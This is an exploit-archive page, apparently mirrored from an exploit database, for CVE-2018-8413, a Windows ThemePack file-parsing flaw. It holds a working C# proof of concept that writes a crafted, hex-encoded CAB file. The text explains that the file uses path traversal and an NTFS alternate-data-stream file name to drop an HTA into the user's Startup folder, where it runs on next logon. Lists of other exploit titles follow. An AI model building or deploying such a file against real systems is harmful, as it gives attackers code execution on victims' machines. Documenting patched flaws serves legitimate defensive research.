Menu

Search for hundreds of thousands of exploits

"Microsoft Windows 10 - Theme API 'ThemePack' File Parsing"

Author

Exploit author

"Eduardo Braun Prado"

Platform

Exploit platform

windows

Release date

Exploit published date

2020-01-29

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
# Exploit Title: Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
# Google Dork: n/a
# Date: 2020-10-28
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: 10 v.1803 (17134.407)
# Tested on: Windows 7, 8.0, 8.1, 10, Server 2012, Server 2012 R2, Server 2016, Server 2019
# CVE : CVE-2018-8413
# Discovered by: Eduardo Braun Prado

[Details]

Microsoft 'themepack' files are classic '.theme' files compressed for
sharing over the internet. Theme files
allows users to customize visual aspects of their device, such as icons
for known features like 'My computer'
and 'trash bin' folders, the default screensaver (which by the way
allowed attackers to run '.scr' files located
on shares upon applying a Theme, in the past. Refer to: CVE-2013-0810).
ThemePack file type uses Microsoft 'CAB' format. The parser contains a
vulnerability that allows attackers
to create arbitrary files on arbitrary locations on the user´s system,
by using the classic
'parent directory' technique, and thus could lead to creation of some
executable files on the
startup folder. This executable will be run on next logon.


Conditions:


1) The 'themepack' file must contain a valid '[dot] theme' file.


The parser allows creating '.theme' files on arbitrary locations, but
the extension must be
'.theme'. There´s a trick, though, to overcome this:

NTFS Alternate Data Streams.

By using a specially crafted name like "abc.hta:[dot] theme" it´s
possible to trick the parser into
dropping a file with an '[dot] hta' extension instead of the legitimate
'[dot] theme', potentially allowing
attackers to compromise the affected systems. The '[dot] hta' extension
is a good choice since you can
merge valid code with arbitrary text or binary files.

Note: Patched on October, 2018 Microsoft monthly patch.


[PoC]

Proof of concept code that drops an 'hta' file to startup dir.


Instructions:

 - Create a new project on MS Visual Studio (any version, included free
ones like 'Express'), choose 'Console Application'

and at 'program . cs' replace the code with the code below

Note: Source code targets dot NET 4.0 and up (previous versions might
work fine though!)


using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ThemePack
{
    class Program
    {
        static void Main(string[] args)
        {
            String exeDir = AppDomain.CurrentDomain.BaseDirectory;
            Directory.SetCurrentDirectory(exeDir);

            string tmpPath = Path.GetTempPath();

            string tpd =
"4D53434600000000AB010000000000002C000000000000000301010001000000000000009500000001000100930100000000000000003C508108200061612E2E5C2E2E5C2E2E5C2E2E5C2E2E5C2E2E5C726F616D696E675C6D6963726F736F66745C77696E646F77735C7374617274206D656E755C70726F6772616D735C737461727475705C6162632E6874613A2E7468656D6500B60133780E019301434B4D51C16A023110BD07F20F5EBC5A85D2163405DDB5871645CCB215BA1ED265C0E024B364E261FDFA66534BBD8499F7DE4CDE4BE68B5374F82AC55775020747294ACB1D9A7E6B1CA88CED4C7B1ED517F4522459413E06C2D1CE78C0A6043E47EAD2D8A741EC4C074149515984FF7E7A47EAD823A85982762646085EE5A5B5E58BC14CF231732735D63D47707BA2386E02305D420BDCC4C112374B08948F8963CE7352148474BB614BC119CC8014DA5EFF90A1BC09EDD5444B3ED76A7A785A3D3FAE5EDE8AE43E18CF9D09E0DB5ECD06B5EB88ED201EDA3BAF3504CEE834A7F84E56937B5DECB77A59AF27EBC3FA37DEC6A424213FA60684365248BA4DA537AA5CAEDECB8F4A8AF9E2E1F6133F";
     
           string tpf = exeDir + "\\C00L.themepack";

            Console.WriteLine("\n\n
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
\n Microsoft Windows Theme API 'ThemePack' File Parsing Vulnerability
PoC (CVE-2018-8413)  \n\n by: Eduardo Braun Prado \n\n
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++");

            StreamWriter s = File.CreateText(tmpPath + "\\themepack000.h");

            s.Write(tpd);
          
            s.Close();

            FileStream f = File.OpenRead(tmpPath + "\\themepack000.h");

            String ax = "";


            byte[] b = new byte[f.Length];

            UTF8Encoding temp = new UTF8Encoding(false);

            while (f.Read(b, 0, b.Length) > 0)
            {
                ax = ax + temp.GetString(b);
            }


            String bx = ax.ToString();
            String cx = "";

            byte[] b02 = new byte[f.Length / 2];
            for (int i = 0; i < f.Length; i += 2)
            {
                cx = bx.Substring(i, 2);
                b02[i / 2] = Convert.ToByte(cx, 16);
            }

            File.WriteAllBytes(tpf, b02);

            if (File.Exists(tpf))
            {
                long fsize = new FileInfo(tpf).Length;

                if (fsize != 0)
                {
                    Console.WriteLine("\n\n\n Done! 'C00L." +
"themepack' file created in the current directory. Vulnerable systems
should plant an HTA on startup dir.");
                }

            }


            }
            }
            }
Release DateTitleTypePlatformAuthor
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-18"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path"localwindows"El Masas"
2020-03-18"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"remotemultiple"Maurizio S"
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2020-03-18"Netlink GPON Router 1.0.11 - Remote Code Execution"webappshardwareshellord
2020-03-17"VMWare Fusion - Local Privilege Escalation"localmacosGrimm
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Microsoft VSCode Python Extension - Code Execution"localmultipleDoyensec
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)"webappsasp"Miguel Mendez Z"
2020-03-14"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)"doswindowseerykitty
2020-03-13"AnyBurn 4.8 - Buffer Overflow (SEH)"localwindows"Richard Davy"
2020-03-13"Drobo 5N2 4.1.1 - Remote Command Injection"remotehardware"Ian Sindermann"
2020-03-13"Centos WebPanel 7 - 'term' SQL Injection"webappslinux"Berke YILMAZ"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure"webappsjava"RedTeam Pentesting GmbH"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
Release DateTitleTypePlatformAuthor
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-18"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path"localwindows"El Masas"
2020-03-14"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)"doswindowseerykitty
2020-03-13"AnyBurn 4.8 - Buffer Overflow (SEH)"localwindows"Richard Davy"
2020-03-12"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-11"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-09"Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)"remotewindowsMetasploit
2020-03-06"Iskysoft Application Framework Service 2.4.3.241 - 'IsAppService' Unquoted Service Path"localwindows"Alejandro Reyes"
2020-03-06"Deep Instinct Windows Agent 1.2.29.0 - 'DeepMgmtService' Unquoted Service Path"localwindows"Oscar Flores"
2020-03-06"SpyHunter 4 - 'SpyHunter 4 Service' Unquoted Service Path"localwindows"Alejandro Reyes"
2020-03-06"ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path"localwindows"Oscar Flores"
2020-03-05"Exchange Control Panel - Viewstate Deserialization (Metasploit)"remotewindowsMetasploit
2020-03-03"Microsoft Windows - 'WizardOpium' Local Privilege Escalation"localwindowspiotrflorczyk
2020-03-02"Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution"remotewindowsPhotubias
2020-03-02"CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow"remotewindowswetw0rk
2020-03-02"Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH)"localwindows"Andrey Stoykov"
2020-03-02"Wing FTP Server 6.2.3 - Privilege Escalation"localwindows"Cary Hooper"
2020-02-26"Core FTP LE 2.2 - Denial of Service (PoC)"doswindows"Ismael Nava"
2020-02-25"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)"doswindows"Ismael Nava"
2020-02-25"aSc TimeTables 2020.11.4 - Denial of Service (PoC)"doswindows"Ismael Nava"
2020-02-25"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)"doswindows"berat isler"
2020-02-24"Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)"doswindows"Cody Winkler"
2020-02-20"Core FTP Lite 1.3 - Denial of Service (PoC)"doswindows"berat isler"
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"Anviz CrossChex - Buffer Overflow (Metasploit)"remotewindowsMetasploit
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation"localwindowsnu11secur1ty
2020-02-17"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47975/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse